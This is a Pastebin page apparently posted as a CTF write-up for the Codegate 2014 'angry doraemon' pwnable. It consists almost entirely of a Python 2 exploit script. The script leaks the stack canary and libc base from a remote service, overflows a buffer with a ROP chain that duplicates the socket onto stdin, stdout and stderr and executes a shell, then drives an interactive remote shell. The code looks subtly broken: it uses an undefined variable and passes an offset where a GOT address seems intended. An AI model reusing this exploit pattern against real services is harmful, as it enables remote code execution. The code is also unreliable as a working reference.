SHARE
TWEET

Codegate 2014 doraemon write up by @_g05u_

a guest Feb 23rd, 2014 560 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #-*- coding:utf-8 -*-
  3.  
  4. # Codegate 2014 write up by @_g05u_
  5. # angry doraemon
  6. # pwnable 250
  7. # null-life.com
  8.  
  9. import re
  10. import os
  11. import sys
  12. import math
  13. import time
  14. import struct
  15. import socket
  16.  
  17. HOST = "58.229.183.18"
  18. PORT = 8888
  19.  
  20. #Ubuntu 13.10 x86
  21. offset_libc_main = 0x19810
  22. offset_dup2 = 0xE11F0
  23.  
  24. got_libc_main = 0x0804B038
  25. got_write = 0x080486e0
  26. rop_pop2_ret = 0x080495BE
  27. exec_sh = 0x08048C62
  28.  
  29. canary = "\x00\x8b\xc3\x84"
  30.  
  31.  
  32. def get_socket():
  33.     f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  34.     f.connect((HOST, PORT))
  35.     return f
  36.        
  37. def read_logo(s):
  38.         logo = ''
  39.         menu = ''
  40.         while 'Waiting 2 seconds' not in logo:
  41.                 logo = s.recv(1024 * 5)
  42.         time.sleep(2.2) #wait 2.2 sec
  43.         while '>' not in menu:
  44.                 menu = s.recv(1024)
  45.                
  46.  
  47. def gadget_leer(addr, n):
  48.         data  = struct.pack("<I", got_write)
  49.         data += struct.pack("<I", 0x080492c5) #exit return
  50.         data += struct.pack("<I", 0x4) #fd abierto
  51.         data += struct.pack("<I", addr)
  52.         data += struct.pack("<I", n)
  53.        
  54.         return data    
  55.  
  56. def get_canary():
  57.         print '[+] get canary '
  58.         s = get_socket()       
  59.         read_logo(s)
  60.         s.send('4')
  61.         time.sleep(0.1)
  62.         s.recv(1024) #leer pregunta
  63.         time.sleep(0.1)
  64.         s.send('y'*10)
  65.         time.sleep(0.1)
  66.         mi_opc = s.recv(26) #leer mi opcion
  67.         _canary = mi_opc[22:]
  68.         print '[+] Canary 0x%s' % (''.join(c.encode('hex') for c in _canary))
  69.         return _canary
  70.  
  71. def get_rop_shell(libc_base):
  72.         print '[+] dup2 address: %s' % hex(libc_base + offset_dup2)
  73.         data  = struct.pack("<I", libc_base + offset_dup2)
  74.         data += struct.pack("<I", rop_pop2_ret)
  75.         data += struct.pack("<I", 4) #fd abierto
  76.         data += struct.pack("<I", 0)
  77.        
  78.         data += struct.pack("<I", libc_base + offset_dup2)
  79.         data += struct.pack("<I", rop_pop2_ret)
  80.         data += struct.pack("<I", 4) #fd abierto
  81.         data += struct.pack("<I", 1)
  82.        
  83.         data += struct.pack("<I", libc_base + offset_dup2)
  84.         data += struct.pack("<I", rop_pop2_ret)
  85.         data += struct.pack("<I", 4) #fd abierto
  86.         data += struct.pack("<I", 2)
  87.  
  88.         data += struct.pack("<I", exec_sh)     
  89.         return data    
  90.  
  91. canary = get_canary()
  92.        
  93. print 'Obteniendo libc base'
  94. #get libc address base 
  95. s = get_socket()       
  96. read_logo(s)
  97. s.send('4')
  98. time.sleep(0.1)
  99. s.recv(1024) #leer pregunta
  100. time.sleep(0.1)
  101. s.send('y'*10 + canary + "A"*12 + gadget_leer(offset_libc_main, 4))
  102. libc_base_address = struct.unpack("<I", s.recv(4))[0] - base_libc_main
  103. print '[+] Addres libc base: %s' % hex(libc_base_address)
  104.  
  105. print 'Lanzando shell'
  106. #lanzar shell
  107. rop_shell = get_rop_shell(libc_base_address)
  108. s = get_socket()       
  109. read_logo(s)
  110. s.send('4')
  111. time.sleep(0.1)
  112. s.recv(1024) #leer pregunta
  113. time.sleep(0.1)
  114. s.send('y'*10 + canary + "A"*12 + rop_shell)
  115.  
  116. while True:
  117.     sys.stdout.write("$ ")
  118.     sys.stdout.flush()
  119.     c = sys.stdin.readline()
  120.     s.send(c)
  121.     time.sleep(0.5)
  122.     print s.recv(4095)
RAW Paste Data
Top